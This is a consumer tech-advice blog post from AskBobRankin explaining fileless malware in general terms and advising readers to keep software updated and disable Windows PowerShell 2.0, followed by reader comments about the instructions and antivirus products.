Are You Vulnerable to Fileless Malware?

Category: Security

A clever (but insidious) software technique that's been around for over a decade has obtained newfound favor among today's malware authors, complicating the work of anti-malware developers and forensic analysts. Tracking down so-called “fileless malware” is to detection of regular malware what ghost-hunting is to catching a garden-variety burglar. Read on to learn about this resurgent threat and what you can do to stop it…

What is Fileless Malware?

Traditional malware consists of one or more files stored on a hard disk. At least one of these files must be executable, and the malware cannot do any harm until that file is executed. Fileless malware, in contrast, resides in RAM memory and is never written to your hard drive as a file. Then there is semi-fileless malware, with some seemingly harmless parts written to disk while the main executable portions remain in RAM or even on a remote server.

Files leave traces as they are read or written to disk. A file has a pattern that can be reduced to a static signature that can be compared to known signatures in antivirus databases. These and other traits of files make it easier to figure out where a file-based malware package came from and what it is.

Instead of tricking the user to download and run an executable file, fileless malware uses legitimate, trusted tools that are part of the operating system to do its dirty work. That means there are no “suspicious” programs on the hard drive, or active in memory. Just the “ghost” lurking in system memory space.

Fileless Malware - The Threat

Fileless malware is fluid. Like water poured into different jars full of pebbles, it perfectly fits itself into unused gaps in RAM, all linked together by beginning and ending memory addresses. Traditional antivirus software looks in vain for the wrong thing – a signature – and in the wrong place – the hard disk – ignoring what is in main memory.

Effective anti-malware also detects the shapeshifting ghost of fileless malware. It identifies suspicious areas of RAM by analyzing traffic that flows between them. Having identified the outline of a ghost, the anti-malware zeroes in on that outline to monitor what crosses it. What the ghost does becomes the important thing, not what it is.

Does the ghost call PowerShell? If so, that call may be blocked until the reason PowerShell is called has been discovered and authorized. Does the ghost send data out to the Internet? To whom and why must be known before that is allowed. All of this learning and blocking must be done instantly, lest some suspicious activity slip past. So effective anti-malware, like fileless malware, must reside in RAM. This requirement constrains how much the ghost-hunting function can do, and how adversely the ghost-hunter affects overall system performance.

Digging Deeper

Fileless malware poses many other challenges for the good guys. I hope these examples give you some appreciation for the prowess of anti-malware developers who keep us safe from much of this nasty stuff, if not all of it. MalwareBytes’ Vasilios Hioureas covers fileless malware in excruciating geekly detail in an ongoing series of articles that begins here.

To be honest, even after reading these highly technical articles, I was still a bit confused about exactly how fileless malware actually sneaks into a computer. Suffice it to say that under the right conditions, some combination of unpatched vulnerabilities, a zero-day exploit, a compromised website, a careless click on an email link, an infected document or USB drive can result in a fileless malware attack. Malicious instructions are then sent to a legitimate program, which executes the attack.

Traditional anti-virus programs that rely on file-based scanning will not stop these attacks. Avast, Avira and Bitdefender do claim to protect against this threat, but I had to dig deep to find it on their websites. MalwareBytes has done a lot of research on this type of malware and seems to understand mitigation strategies well.

PC-Matic also differentiates itself by focusing on emerging polymorphic threats and fileless ransomware detection. If you missed it, see my review: PC Matic 4.0 – My Review.

It's important to keep yourself aware of emerging threats and take action where you can to protect yourself, your computer, and your important data. Keeping your operating system, application software and anti-malware defenses updated is an important first step. And since some of these fileless malware attacks rely on PowerShell, disabling that may help as well. To do so, follow these steps:

  • Type windows features in the Windows 10 search box, and press ENTER.
  • Scroll down to the Windows PowerShell 2.0 line item
  • Uncheck the box next to it, and click OK
  • Wait for the prompt to restart your computer.

Have you been affected by fileless malware, or has your security tool detected one? Your thoughts on this topic are welcome. Post your comment or question below…

 
Ask Your Computer or Internet Question

 
  (Enter your question in the box above.)

It's Guaranteed to Make You Smarter...

AskBob Updates: Boost your Internet IQ & solve computer problems.
Get your FREE Subscription!


Email:

Check out other articles in this category:



Link to this article from your site or blog. Just copy and paste from this box:

This article was posted by on 22 Jun 2021


For Fun: Buy Bob a Snickers.

Prev Article:
Geekly Update - 16 June 2021

The Top Twenty
Next Article:
Geekly Update - 23 June 2021

Most recent comments on "Are You Vulnerable to Fileless Malware?"

Posted by:

Ken H
22 Jun 2021

Bob, you (or someone else) must have already told me to disable Power Shell 2.0 because it was not checked when I checked just now.


Posted by:

Brian B
22 Jun 2021

From Eset's web site:-

"Moreover, some new malicious code now operates "in-memory only," without needing persistent components in the file system that can be detected conventionally. Only memory scanning technology, such as ESET Advanced Memory Scanner, can discover these attacks."

I'm sure others also protect just as well.


Posted by:

Henry B.
23 Jun 2021

Bob,thanks as always. I disabled PowerShell on both of our machines. 😊


Posted by:

Cory McIntyre
23 Jun 2021

When I type "Windows Power Shell 2.0 or any other search with Windows Power Shell I don't find anything that allows me to check or uncheck a box. I am taken to a command prompt. I am running Windows 10, version 2004.


Posted by:

Brian B
23 Jun 2021

Cory, Try typing "Type windows features in the Windows 10 search box, and press ENTER."

Rather than turn off PowerShell, I just made sure my AV application detects and wipes fileless malware.


Posted by:

Wild Bill
23 Jun 2021

@Cory - Type Windows Features to access the Control Panel for windows features and then scroll down to Windows PowerShell. It would appear that after some point in 2019 Windows PowerShell is not enabled by default (no box checked), if your installation is up to date.


Posted by:

Boneman
23 Jun 2021

@Cory McIntyre

Try typing "Windows Features" for Windows 10, and continue from there.


Posted by:

John
23 Jun 2021

I typed windows etc in the search box and unticked
Scanned with Avg, nothing found and restarted.


Posted by:

Dave
23 Jun 2021

This is what came up when I typed windows feature it run box
"Windows cannot find 'windows'. Make sure you typed the name correctly, and then try again".


Posted by:

Diane
23 Jun 2021

I have malwarebytes installed on my 2020 MacBook Air. Does any of this apply to me?


Posted by:

Frances
23 Jun 2021

What about Windows 7 users?


Posted by:

John
23 Jun 2021

I followed the instructions (although they were slightly different than what Bob said they would be), unchecked P.S.2.0. Did not have to restart, although I did so manually. Now I do not have a Windows Search Box. How do I get that back? (Version 20H2).


Posted by:

RandiO
24 Jun 2021

"Do keep in mind that [this is] only disabling the deprecated PowerShell [version] 2.0 [only] but the regular PowerShell [and ISE] is still enabled. In fact, you can access [both] as you would normally."
From
"3 Ways to Disable PowerShell on Windows 10[...] including PowerShell 7.
• How to block PowerShell access using Group Policy
• How to block PowerShell access using Security Policy
• How to block PowerShell 7 access uninstalling app
If you are trying to prevent users from making unwanted system changes, in addition to restricting access to [disabling or uninstalling] PowerShell, you can also disable Command Prompt, Task Manager, and Registry. Furthermore, you can even try switching the account type to "Standard User" to prevent users from making system changes and make the account more secure. However, users will still have access to PowerShell, Command Prompt, and Task Manager to perform some common tasks."
From


Posted by:

RandiO
24 Jun 2021

carets are a no-no and links get stripped:
https://windowsloop.com/disable-powershell-v2/
https://www.windowscentral.com/how-disable-powershell-windows-10


Posted by:

Willard M.
30 Jun 2021

Oh, great! Another computer safety issue I have to deal with. All the time I [should] have saved as a result of the wonderful personal computer, gets chewed up protecting my [computer] safety.

At some point I will be spending more free time futzing with computer maintenance/safety than actually utilizing my computer.


Posted by:

Bruce
05 Jul 2021

Doesn't RAM empty when a computer is turned off?


Post your Comments, Questions or Suggestions

*     *     (* = Required field)

    (Your email address will not be published)
(you may use HTML tags for style)

YES... spelling, punctuation, grammar and proper use of UPPER/lower case are important! Comments of a political nature are discouraged. Please limit your remarks to 3-4 paragraphs. If you want to see your comment posted, pay attention to these items.

All comments are reviewed, and may be edited or removed at the discretion of the moderator.

NOTE: Please, post comments on this article ONLY.
If you want to ask a question click here.


Free Tech Support -- Ask Bob Rankin
Subscribe to AskBobRankin Updates: Free Newsletter

Copyright © 2005 - Bob Rankin - All Rights Reserved
Privacy Policy     RSS/XML


Article information: AskBobRankin -- Are You Vulnerable to Fileless Malware? (Posted: 22 Jun 2021)
Source: https://askbobrankin.com/are_you_vulnerable_to_fileless_malware.html
Copyright © 2005 - Bob Rankin - All Rights Reserved